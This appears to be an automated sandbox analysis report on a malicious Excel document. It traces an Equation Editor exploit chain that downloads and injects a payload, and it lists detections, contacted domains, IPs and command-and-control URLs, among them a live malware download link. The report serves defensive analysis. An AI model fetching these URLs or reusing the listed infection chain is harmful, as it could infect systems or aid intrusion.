          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 345175 Sample: Doc_37584567499454.xlsx Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 50 www.1033325.com 2->50 62 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->62 64 Multi AV Scanner detection for domain / URL 2->64 66 Found malware configuration 2->66 68 17 other signatures 2->68 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 37 17 2->16         started        signatures3 process4 dnsIp5 52 medicelcoolers.cn 185.26.106.165, 49167, 80 ATE-ASFR France 11->52 44 C:\Users\user\AppData\Local\...\file2[1].exe, PE32 11->44 dropped 46 C:\Users\Public\vbc.exe, PE32 11->46 dropped 88 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->88 18 vbc.exe 1 8 11->18         started        48 C:\Users\user\...\~$Doc_37584567499454.xlsx, data 16->48 dropped file6 signatures7 process8 file9 40 C:\Users\user\AppData\Local\...\tmp4BF0.tmp, XML 18->40 dropped 42 C:\Users\user\AppData\Roaming\VqdYEvk.exe, PE32 18->42 dropped 70 Tries to detect virtualization through RDTSC time measurements 18->70 72 Injects a PE file into a foreign processes 18->72 22 vbc.exe 18->22         started        25 schtasks.exe 18->25         started        27 vbc.exe 18->27         started        29 2 other processes 18->29 signatures10 process11 signatures12 80 Modifies the context of a thread in another process (thread injection) 22->80 82 Maps a DLL or memory area into another process 22->82 84 Sample uses process hollowing technique 22->84 86 Queues an APC in another process (thread injection) 22->86 31 explorer.exe 22->31 injected process13 dnsIp14 54 www.alparmuhendislik.com 23.105.124.225, 49172, 80 LEASEWEB-USA-SFO-12US United States 31->54 56 brainandbodystrengthcoach.com 34.102.136.180, 49168, 49171, 80 GOOGLEUS United States 31->56 58 11 other IPs or domains 31->58 60 System process connects to network (likely due to code injection or exploit) 31->60 35 cmstp.exe 31->35         started        signatures15 process16 signatures17 74 Modifies the context of a thread in another process (thread injection) 35->74 76 Maps a DLL or memory area into another process 35->76 78 Tries to detect virtualization through RDTSC time measurements 35->78 38 cmd.exe 35->38         started        process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Doc_37584567499454.xlsx24%ReversingLabsDocument-Office.Exploit.Heuristic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          epicmassiveconcepts.com5%VirustotalBrowse
          www.alparmuhendislik.com0%VirustotalBrowse
          medicelcoolers.cn8%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://medicelcoolers.cn/file2.exe100%Avira URL Cloudmalware
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.brainandbodystrengthcoach.com/csv8/?l48tdRq0=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&RF=fra80%Avira URL Cloudsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://www.soundon.events/csv8/?l48tdRq0=f1zFyjN0EmLviNF8fKKCz7YQnzvARTiViS3XLvwk6t41gXJpQ0SRSkWjGn1VRBwYOzEhaA==&RF=fra80%Avira URL Cloudsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.alparmuhendislik.com/csv8/?l48tdRq0=qrM/jq4LcG9rGmd8GV9Oj1wgtu+jolIiSWn3/swEVCZ8jKRp1GYmoG9veOaFoBSGv/vRuA==&RF=fra80%Avira URL Cloudsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          s.multiscreensite.com
          100.24.208.97
          truefalse
            high
            epicmassiveconcepts.com
            34.102.136.180
            truetrueunknown
            dualstack.appdrag-883352178.eu-west-1.elb.amazonaws.com
            52.209.107.24
            truefalse
              high
              www.alparmuhendislik.com
              23.105.124.225
              truetrueunknown
              medicelcoolers.cn
              185.26.106.165
              truetrueunknown
              ext-cust.squarespace.com
              198.185.159.144
              truefalse
                high
                brainandbodystrengthcoach.com
                34.102.136.180
                truetrue
                  unknown
                  www.stattests.com
                  unknown
                  unknowntrue
                    unknown
                    www.1033325.com
                    unknown
                    unknowntrue
                      unknown
                      www.brainandbodystrengthcoach.com
                      unknown
                      unknowntrue
                        unknown
                        www.soundon.events
                        unknown
                        unknowntrue
                          unknown
                          www.gourmetgroceriesfast.com
                          unknown
                          unknowntrue
                            unknown
                            www.arb-invest.com
                            unknown
                            unknowntrue
                              unknown
                              www.epicmassiveconcepts.com
                              unknown
                              unknowntrue
                                unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://medicelcoolers.cn/file2.exetrue
                                • Avira URL Cloud: malware
                                unknown
                                http://www.brainandbodystrengthcoach.com/csv8/?l48tdRq0=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&RF=fra8true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.soundon.events/csv8/?l48tdRq0=f1zFyjN0EmLviNF8fKKCz7YQnzvARTiViS3XLvwk6t41gXJpQ0SRSkWjGn1VRBwYOzEhaA==&RF=fra8true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.alparmuhendislik.com/csv8/?l48tdRq0=qrM/jq4LcG9rGmd8GV9Oj1wgtu+jolIiSWn3/swEVCZ8jKRp1GYmoG9veOaFoBSGv/vRuA==&RF=fra8true
                                • Avira URL Cloud: safe
                                unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://search.chol.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.mercadolivre.com.br/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.merlin.com.pl/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://search.ebay.de/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.mtv.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://www.rambler.ru/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.nifty.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://www.dailymail.co.uk/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www3.fnac.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://buscar.ya.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://search.yahoo.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://www.sogou.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://asp.usatoday.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://fr.search.yahoo.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://rover.ebay.comexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://in.search.yahoo.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://search.ebay.in/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://%s.comexplorer.exe, 0000000B.00000000.2200635919.000000000A330000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              low
                                                              http://msk.afisha.ru/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2181185333.000000000273B000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://search.rediff.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://www.ya.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://www.etmall.com.tw/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://it.search.dada.net/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://search.naver.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://www.google.ru/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://search.hanafos.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.abril.com.br/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://search.daum.net/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://search.naver.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://search.msn.co.jp/results.aspx?q=explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.clarin.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://buscar.ozu.es/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://kr.search.yahoo.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.about.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://busca.igbusca.com.br/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.ask.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.priceminister.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.cjmall.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://search.centrum.cz/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://suche.t-online.de/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.google.it/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://search.auction.co.kr/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.ceneo.pl/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.amazon.de/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000B.00000000.2196199008.000000000839A000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://sads.myspace.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://busca.buscape.com.br/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.pchome.com.tw/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://browse.guardian.co.uk/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://google.pchome.com.tw/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.rambler.ru/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://uk.search.yahoo.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://espanol.search.yahoo.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.ozu.es/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://search.sify.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://openimage.interpark.com/interpark.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://search.yahoo.co.jp/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://search.ebay.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.gmarket.co.kr/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://search.nifty.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://searchresults.news.com.au/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.google.si/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.google.cz/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.soso.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.univision.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://search.ebay.it/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.asharqalawsat.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://busca.orange.es/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cnweb.search.live.com/results.aspx?q=explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://auto.search.msn.com/response.asp?MT=explorer.exe, 0000000B.00000000.2200635919.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.yahoo.co.jpexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.target.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://buscador.terra.es/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://search.orange.co.uk/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.iask.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.tesco.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://cgi.search.biglobe.ne.jp/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://search.seznam.cz/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://suche.freenet.de/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.interpark.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.ipop.co.kr/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://search.espn.go.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.myspace.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://search.centrum.cz/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://p.zhongsou.com/favicon.icoexplorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://service2.bfast.com/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://www.%s.comPAvbc.exe, 00000004.00000002.2184173591.0000000007960000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.2381390031.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            low
                                                                                                                                                            http://ariadna.elmundo.es/explorer.exe, 0000000B.00000000.2200990162.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high

                                                                                                                                                              Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              100.24.208.97
                                                                                                                                                              unknownUnited States
                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                              198.185.159.144
                                                                                                                                                              unknownUnited States
                                                                                                                                                              53831SQUARESPACEUSfalse
                                                                                                                                                              52.209.107.24
                                                                                                                                                              unknownUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              34.102.136.180
                                                                                                                                                              unknownUnited States
                                                                                                                                                              15169GOOGLEUStrue
                                                                                                                                                              23.105.124.225
                                                                                                                                                              unknownUnited States
